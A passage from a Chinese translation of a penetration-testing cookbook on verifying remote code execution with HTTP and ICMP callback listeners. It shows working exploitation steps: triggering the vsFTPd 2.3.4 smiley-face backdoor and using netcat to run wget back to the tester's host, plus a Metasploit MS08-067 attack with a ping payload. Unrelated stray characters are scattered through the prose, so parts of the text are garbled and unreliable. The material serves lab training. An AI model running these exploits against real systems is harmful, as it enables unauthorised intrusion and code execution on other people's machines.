大多數(shù)漏洞掃描程序會通過評估多個不同的響應(yīng)來嘗試確定系統(tǒng)是否容易受特定攻擊拌倍。 一些情況下,漏洞掃描可以簡化為與遠程服務(wù)建立TCP連接并且通過自我公開的特征噪径,識別已知的漏洞版本柱恤。 在其他情況下,可以向遠程服務(wù)發(fā)送一系列復(fù)雜的特定的探測請求找爱,來試圖請求對服務(wù)唯一的響應(yīng)梗顺,該服務(wù)易受特定的攻擊暇番。Nessuscmd執(zhí)行相同的測試坤按,或者由常規(guī)Nessus接口户魏,給定一個特定的插件ID來執(zhí)行。 唯一的區(qū)別是執(zhí)行漏洞掃描的方式吊宋。
5.6 使用 HTTP 交互來驗證漏洞
作為滲透測試者挖藏,任何給定漏洞的最佳結(jié)果是實現(xiàn)遠程代碼執(zhí)行议惰。 但是揽咕,在某些情況下,我們可能只想確定遠程代碼執(zhí)行漏洞是否可利用粟关,但不想實際遵循整個利用和后續(xù)利用過程疮胖。 執(zhí)行此操作的一種方法是創(chuàng)建一個Web服務(wù)器,該服務(wù)器將記錄交互并使用給定的利用來執(zhí)行將代碼闷板,使遠程主機與Web服務(wù)器交互澎灸。 此秘籍戰(zhàn)死了如何編寫自定義腳本,用于使用HTTP流量驗證遠程代碼執(zhí)行漏洞蛔垢。
準(zhǔn)備
要使用HTTP交互驗證漏洞击孩,你需要一個運行擁有遠程代碼執(zhí)行漏洞的軟件的系統(tǒng)迫悠。 此外鹏漆,本節(jié)需要使用文本編輯器(如VIM或Nano)將腳本寫入文件系統(tǒng)。 有關(guān)編寫腳本的更多信息创泄,請參閱本書第一章中的“使用文本編輯器(VIM和Nano)”秘籍艺玲。
操作步驟
在實際利用給定的漏洞之前,我們必須部署一個Web服務(wù)器鞠抑,它會記錄與它的交互饭聚。 這可以通過一個簡單的Python腳本來完成,如下所示:
#!/usr/bin/python
import socket
print "Awaiting connection...\n"
httprecv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
httprecv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
httprecv.bind(("0.0.0.0",8000))
httprecv.listen(2)
(client, ( ip,sock)) = httprecv.accept()
print "Received connection from : ", ip
data = client.recv(4096)
print str(data)
client.close()
httprecv.close()
這個Python腳本使用套接字庫來生成一個Web服務(wù)器搁拙,該服務(wù)器監(jiān)聽所有本地接口的TCP 8000 端口秒梳。 接收到來自客戶端的連接時,腳本將返回客戶端的IP地址和發(fā)送的請求箕速。 為了使用此腳本驗證漏洞酪碘,我們需要執(zhí)行代碼,使遠程系統(tǒng)與托管的Web服務(wù)進行交互盐茎。 但在這之前兴垦,我們需要使用以下命令啟動我們的腳本:
root@KaliLinux:~# ./httprecv.py
Awaiting connection...
接下來,我們需要利用導(dǎo)致遠程代碼執(zhí)行的漏洞字柠。 通過檢查Metasploitable2盒子內(nèi)的Nessus掃描結(jié)果探越,我們可以看到運行的FTP服務(wù)有一個后門,可以通過提供帶有笑臉的用戶名來觸發(fā)窑业。 沒有開玩笑......這實際上包含在 FTP 生產(chǎn)服務(wù)中钦幔。 為了嘗試?yán)盟覀儗⑹紫仁褂眠m當(dāng)?shù)挠脩裘B接到服務(wù)常柄,如下所示:
root@KaliLinux:~# ftp 172.16.36.135 21
Connected to 172.16.36.135.
220 (vsFTPd 2.3.4)
Name (172.16.36.135:root): Hutch:)
331 Please specify the password.
Password:
^C
421 Service not available, remote server has closed connection
嘗試連接到包含笑臉的用戶名后节槐,后門應(yīng)該在遠程主機的TCP端口6200上打開搀庶。我們甚至不需要輸入密碼。 反之铜异,Ctrl + C可用于退出FTP客戶端哥倔,然后可以使用Netcat連接到打開的后門,如下所示:
root@KaliLinux:~# nc 172.16.36.135 6200
wget http://172.16.36.224:8000
--04:18:18-- http://172.16.36.224:8000/
=> `index.html'
Connecting to 172.16.36.224:8000... connected.
HTTP request sent, awaiting response... No data received.
Retrying.
--04:18:19-- http://172.16.36.224:8000/
(try: 2) => `index.html'
Connecting to 172.16.36.224:8000... failed: Connection refused.
^C
與開放端口建立TCP連接后揍庄,我們可以使用我們的腳本來驗證咆蒿,我們是否可以進行遠程代碼執(zhí)行。 為此蚂子,我們嘗試以 HTTP 檢測服務(wù)器的 URL 使用wget沃测。 嘗試執(zhí)行此代碼后,我們可以通過查看腳本輸出來驗證是否收到了HTTP請求:
root@KaliLinux:~# ./httprecv.py
Received connection from : 172.16.36.135
GET / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 172.16.36.224:8000
Connection: Keep-Alive
工作原理
此腳本的原理是識別來自遠程主機的連接嘗試食茎。 執(zhí)行代碼會導(dǎo)致遠程系統(tǒng)連接回我們的監(jiān)聽服務(wù)器蒂破,我們可以通過利用特定的漏洞來驗證遠程代碼執(zhí)行是否存在。 在遠程服務(wù)器未安裝wget或curl的情況下别渔,可能需要采用另一種手段來識別遠程代碼執(zhí)行附迷。
5.7 使用 ICMP 交互來驗證漏洞
作為滲透測試者,任何給定漏洞的最佳結(jié)果是實現(xiàn)遠程代碼執(zhí)行哎媚。 但是喇伯,在某些情況下,我們可能只想確定遠程代碼執(zhí)行漏洞是否可利用拨与,但不想實際遵循整個利用和后續(xù)利用過程稻据。 一種方法是運行一個腳本,記錄ICMP流量买喧,然后在遠程系統(tǒng)上執(zhí)行ping命令捻悯。 該秘籍演示了如何編寫自定義腳本,用于使用ICMP流量驗證遠程代碼執(zhí)行漏洞淤毛。
準(zhǔn)備
要使用ICMP交互驗證漏洞今缚,你需要一個運行擁有遠程代碼執(zhí)行漏洞的軟件的系統(tǒng)。 此外钱床,本節(jié)需要使用文本編輯器(如VIM或Nano)將腳本寫入文件系統(tǒng)荚斯。 有關(guān)編寫腳本的更多信息,請參閱本書第一章中的“使用文本編輯器(VIM和Nano)”秘籍查牌。
操作步驟
在實際利用給定漏洞之前事期,我們必須部署一個腳本,來記錄傳入的ICMP流量纸颜。 這可以通過使用Scapy的簡單Python腳本完成兽泣,如下所示:
#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def rules(pkt):
try:
if (pkt[IP].dst=="172.16.36.224") and (pkt[ICMP]):
print str(pkt[IP].src) + " is exploitable"
except:
pass
print "Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listening"
sniff(lfilter=rules,store=0)
這個Python腳本監(jiān)聽所有傳入的流量,并將發(fā)往掃描系統(tǒng)的任何ICMP流量的源標(biāo)記為存在漏洞胁孙。 為了使用此腳本驗證漏洞是否能夠利用唠倦,我們需要執(zhí)行代碼称鳞,使遠程系統(tǒng)ping我們的掃描系統(tǒng)。 為了演示這一點稠鼻,我們可以使用 Metasploit 來利用遠程代碼執(zhí)行漏洞冈止。 但在這之前,我們需要啟動我們的腳本候齿,如下:
root@KaliLinux:~# ./listener.py
Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listening
接下來熙暴,我們需要利用導(dǎo)致遠程代碼執(zhí)行的漏洞。 通過檢查 Windows XP 框的 Nessus 掃描結(jié)果慌盯,我們可以看到系統(tǒng)容易受到 MS08-067 漏洞的攻擊周霉。 為了驗證這一點,我們使用執(zhí)行ping命令的載荷亚皂,使其ping我們的掃描系統(tǒng)來利用漏洞俱箱,如下所示:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(ms08_067_netapi) > set RHOST 172.16.36.225
RHOST => 172.16.36.225
msf exploit(ms08_067_netapi) > set CMD cmd /c ping 172.16.36.224 -n 1
CMD => cmd /c ping 172.16.36.224 -n 1
msf exploit(ms08_067_netapi) > exploit
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
Metasploit中的利用配置為使用windows / exec載荷,它在被利用系統(tǒng)中執(zhí)行代碼灭必。 此載荷配置為向我們的掃描系統(tǒng)發(fā)送單個ICMP回顯請求狞谱。 執(zhí)行后,我們可以通過查看仍在監(jiān)聽的原始腳本來確認(rèn)漏洞利用是否成功厂财,如下所示:
root@KaliLinux:~# ./listener.py
Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listening
172.16.36.225 is exploitable
工作原理
此腳本的原理是監(jiān)聽來自遠程主機的傳入的ICMP流量芋簿。 通過執(zhí)行代碼峡懈,使遠程系統(tǒng)向我們的監(jiān)聽服務(wù)器發(fā)送回顯請求璃饱,我們可以通過利用特定的漏洞來驗證遠程代碼執(zhí)行是否可以利用。
